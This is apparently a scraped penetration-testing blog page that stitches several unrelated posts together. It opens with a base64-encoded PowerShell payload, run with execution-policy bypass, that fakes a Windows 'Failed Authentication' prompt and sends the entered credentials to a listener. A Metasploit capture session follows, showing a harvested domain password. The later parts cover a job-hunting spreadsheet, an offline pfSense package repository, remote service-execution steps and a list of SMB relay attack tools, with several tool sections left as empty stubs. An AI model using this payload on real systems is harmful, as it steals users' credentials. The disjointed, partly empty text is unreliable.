cat power.txt | iconv --to-code UTF-16LE | base64JABjAHIAZQBkACAAPQAgACQAaABvAHMAdAAuAHUAaQAuAHAAcgBvAG0AcAB0AGYAbwByAGMAcgBlAGQAZQBuAHQAaQBhAGwAKAAnAEYAYQBpAGwAZQBkACAAQQB1AHQAaABlAG4AdABpAGMAYQB0AGkAbwBuACcALAAnACcALABbAEUAbgB2AGkAcgBvAG4AbQBlAG4AdABdADoAOgBVAHMAZQByAEQAbwBtAGEAaQBuAE4AYQBtAGUAIAArACAAIgBcACIAIAArACAAWwBFAG4AdgBpAHIAbwBuAG0AZQBuAHQAXQA6ADoAVQBzAGUAcgBOAGEAbQBlACwAWwBFAG4AdgBpAHIAbwBuAG0AZQBuAHQAXQA6ADoAVQBzAGUAcgBEAG8AbQBhAGkAbgBOAGEAbQBlACkAOwAKAFsAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFMAZQByAHYAaQBjAGUAUABvAGkAbgB0AE0AYQBuAGEAZwBlAHIAXQA6ADoAUwBlAHIAdgBlAHIAQwBlAHIAdABpAGYAaQBjAGEAdABlAFYAYQBsAGkAZABhAHQAaQBvAG4AQwBhAGwAbABiAGEAYwBrACAAPQAgAHsAJAB0AHIAdQBlAH0AOwAKACQAdwBjACAAPQAgAG4AZQB3AC0AbwBiAGoAZQBjAHQAIABuAGUAdAAuAHcAZQBiAGMAbABpAGUAbgB0ADsACgAkAHcAYwAuAEgAZQBhAGQAZQByAHMALgBBAGQAZAAoACIAVQBzAGUAcgAtAEEAZwBlAG4AdAAiACwAIgBXAGcAZQB0AC8AMQAuADkAKwBjAHYAcwAtAHMAdABhAGIAbABlACAAKABSAGUAZAAgAEgAYQB0ACAAbQBvAGQAaQBmAGkAZQBkACkAIgApADsACgAkAHcAYwAuAFAAcgBvAHgAeQAgAD0AIABbAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBSAGUAcQB1AGUAcwB0AF0AOgA6AEQAZQBmAGEAdQBsAHQAVwBlAGIAUAByAG8AeAB5ADsACgAkAHcAYwAuAFAAcgBvAHgAeQAuAEMAcgBlAGQAZQBuAHQAaQBhAGwAcwAgAD0AIABbAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBDAHIAZQBkAGUAbgB0AGkAYQBsAEMAYQBjAGgAZQBdADoAOgBEAGUAZgBhAHUAbAB0AE4AZQB0AHcAbwByAGsAQwByAGUAZABlAG4AdABpAGEAbABzADsACgAkAHcAYwAuAGMAcgBlAGQAZQBuAHQAaQBhAGwAcwAgAD0AIABuAGUAdwAtAG8AYgBqAGUAYwB0ACAAcwB5AHMAdABlAG0ALgBuAGUAdAAuAG4AZQB0AHcAbwByAGsAYwByAGUAZABlAG4AdABpAGEAbAAoACQAYwByAGUAZAAuAHUAcwBlAHIAbgBhAG0AZQAsACAAJABjAHIAZQBkAC4AZwBlAHQAbgBlAHQAdwBvAHIAawBjAHIAZQBkAGUAbgB0AGkAYQBsACgAKQAuAHAAYQBzAHMAdwBvAHIAZAAsACAAJwAnACkAOwAKACQAcgBlAHMAdQBsAHQAIAA9ACAAJAB3AGMALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAcwA6AC8ALwAxADcAMgAuADEANgAuADEAMAAyAC4AMQA2ADMAJwApADsACgA=

Then execute powershell -ep bypass -enc <the encoded text from above> and you get this:

Image should be here:

1234567891011121314151617181920212223242526272829303132

root@wpad:~/metasploit-framework# ./msfconsole -Lqmsf > use auxiliary/server/capture/http_basic msf auxiliary(http_basic) > show optionsModule options (auxiliary/server/capture/http_basic):   Name         Current Setting  Required  Description   ----         ---------------  --------  -----------   REALM        Secure Site      yes       The authentication realm you'd like to present.   RedirectURL                   no        The page to redirect users to after they enter basic auth creds   SRVHOST      0.0.0.0          yes       The local host to listen on. This must be an address on the local machine or 0.0.0.0   SRVPORT      80               yes       The local port to listen on.   SSL          false            no        Negotiate SSL for incoming connections   SSLCert                       no        Path to a custom SSL certificate (default is randomly generated)   SSLVersion   SSL3             no        Specify the version of SSL that should be used (accepted: SSL2, SSL3, TLS1)   URIPATH                       no        The URI to use for this exploit (default is random)msf auxiliary(http_basic) > set SSL trueSSL => truemsf auxiliary(http_basic) > set SRVPORT 443SRVPORT => 443msf auxiliary(http_basic) > set URIPATH /URIPATH => /msf auxiliary(http_basic) > run[*] Auxiliary module execution completedmsf auxiliary(http_basic) > [*] Listening on 0.0.0.0:443...[*] Using URL: https://0.0.0.0:443/[*]  Local IP: https://172.16.102.163:443/[*] Server started.[*] 172.16.102.140   http_basic - Sending 401 to client 172.16.102.140[+] 172.16.102.140 - Credential collected: "SITTINGDUCK\user:ASDqwe123" => /

Game over!

It’s often tough from both hiring and job hunters to find one another at conferences. I think this is mostly because of a couple things.

1. No one wants to stand at a both on either side and talk job stuff in front of a bunch of people and people at booths rarely get the chance to get away.
2. It’s hard to know “who” to talk to.

So I created a very simple Google doc to help put twitter handles and links together for people who are job hunting and people who are hiring to kinda get to know who to talk to.

Got more to add? Please let me know and I’ll get it added, or simply make a comment on the Google doc with the info to add

Link to the doc is here:

https://docs.google.com/spreadsheets/d/1TytbnvqekJEF0jxLANe6sNa5fu05dFaHEP7zudlJej0/edit?usp=sharing

Hope this helps,

Rob

A while back I needed to set up a pfSense box for CTF/example stuff that didn’t and wouldn’t ever have Internet connectivity. Doesn’t seem like much of a task right? Just pop it in and go. Problem is that you loose the use of the packages that help make pfSense so awesome.

Once I figured it out at that time, I made a Forum post so that anyone running into the same issue wouldn’t have to struggle as much:

https://forum.pfsense.org/index.php?topic=55504.0

Most things never disappear from the Internet but I was looking for an old forum post I had bookmarked regarding some persistence methods that I noticed was no longer there since the forum owner had gotten rid of the forum as too much hassle. I get it, but when I went to Archive.org to get saved they didn’t have a copy. So this is what this post is for, to save that content just in case it disappears.

Also, here is a bug report for the “issue” (been open since 2012):

• http://redmine.pfsense.org/issues/2586

If you are following:

• http://doc.pfsense.org/index.php/Creating_Your_Own_Package_Repository

and you are getting:

Unable to communicate with 192.168.1.100 Please verify DNS and interface configuration, and that pfSense has functional Internet connectivity.

because you are using the repo to enable a offline (non internet connected) host to be able to utilize packages all you have to do is:

1. Go into Services –> DNS Forwarder and add a Host Override

1234

Host: wwwDomain: pfsense.orgIP Address: 127.0.0.1Description: null routed record to enable offline repo

Then make sure you have the IP or hostname of your package repository web server in the /pkg_mgr_settings.php (on 2.0, follow the guidelines on the doc above for older versions). After that you should be good to go. Of course this is barring any Firewall blockages you might have in place so be sure to test connectivity from the pfSense box to the web server.

So, that was just the beginning, it’s actually better to not null-route it but make the following entries:

1234

files.pfsense.org - 192.168.1.100files.pfsense.com - 192.168.1.100www.pfsense.org - 192.168.1.100www.pfsense.com - 192.168.1.100

If your package web server is 192.168.1.100. Next is the problem of not having the packages themselves. So wget -mk -np http://files.pfsense.org/packages/ gave me a directory that I plopped into my already existant packages directory (created from the git clone as described in the documentation) but the problem I ran into was the php files being rendered still (which made any packages that pulled php files get the rendered version instead of source).

So you need to add a .htaccess file in the packages directory with the following:

123

RemoveHandler .php .phtml .php3RemoveType .php .phtml .php3php_flag engine off

Make sure that AllowOverride all is enabled if you are running Apache to host the package site, if not, you’ll have to google how to allow .htaccess files for your particular server. (or if you server doesn’t support htaccess files then how to enable source disclosure)

After those alterations I seem to be off to the races for the most part. Some packages pull from other websites, but altering the package_8.xml or just rerouting the dns seems to solve most of those issues.

1. (Optional) Upload a service executable (PSEXECSVC.EXE in the case of SysInternal’s tool) to the ADMIN$ share
2. Connect to the service manager on the remote host, and create a service based on either a local (to the remote system) executable or the uploaded one.
3. Run the service
4. Stop and delete the service and uploaded file pulling down the resulting output if any from the execution.

1. Installing it on a random VPS is dead simple and doesn’t need the Kali repos to get right, nor Debian/Ubuntu.
2. It defaults to an “semi-interactive shell” which writes and reads output from the ADMIN$ shell by default. Something I would normally have to do manually with a bunch of tools
3. As with the WMIS package, it allows you to just create a process without the ADMIN$ write/read.

WMIS

Usage:

Example:

Example:

WMIEXEC.PY

Usage:

Example:

• SMBRelay
• SMBRelay3
• SpiderLabs Responder
• SMBRelayX in Impacket
• HTTP NTLM Relay Metasploit Module
• SMB Relay PSExec Metasploit Module
• Oracle SMB Relay Metasploit Module
• SAP SMB Relay Metasploit Module

Squirtle

Intercepter-NG

Zack Attack

Other References:

• 2014-02 SpiderLabs– Responder 2.0 Owning Windows Networks Part 3
• 2014-01 NetSPI Blog– SMB Attacks Through Directory Traversal
• 2013-06 Ares– SMB Hijacking Kerberos is defeated
• 2013-04 SANS Pentesting Blog– SMB Relay Demystified and NTLMv2 Pwnage with Python
• 2013-01 Core Security Training Video– How To Perform a SMB Relay Attack
• 2013-01 Mark Gamache– NTLM Challenge Response is 100% Broken
• 2012-12 NetSPI Blog– Executing SMB Relay Attacks via SQL Server using Metasploit
• 2012-07 WebstersProdigy– Metasploit Generic NTLM Relay Module
• 2012-04 Ares– Actuality of SMBRelay in Modern Windows Networks
• 2011-01 Digital Security Research Group Blog– SMBRelay Bible
• 2009-07 Carnal0wnage– Metasploit Oracle TNSCMD SMBRelay Demo
• 2008-11 Ron Bowes– Preventing SMB Relay Attacks
• 2008-08 Kurt Grutzmacher at DEF CON 16– NTLM is Dead!
• 2008-06 John Heasman– Stealing Password Hashes with Java and IE
• 2008-04 Eric Rachner: NTLM Relay Attacks– Released tool ‘scurvy’
• 2007-08 HD Moore and Valsmith– Tactical Exploitation
• 2004-12 (ARCHIVE.ORG) Jesse Burns at SySCAN– NTLM Authentication Unsafe
• 2002-01 Azbil SecurityFriday Ltd– ScoopLM
• 2001-03 @lantaCon– Reference from March 31 2001 talk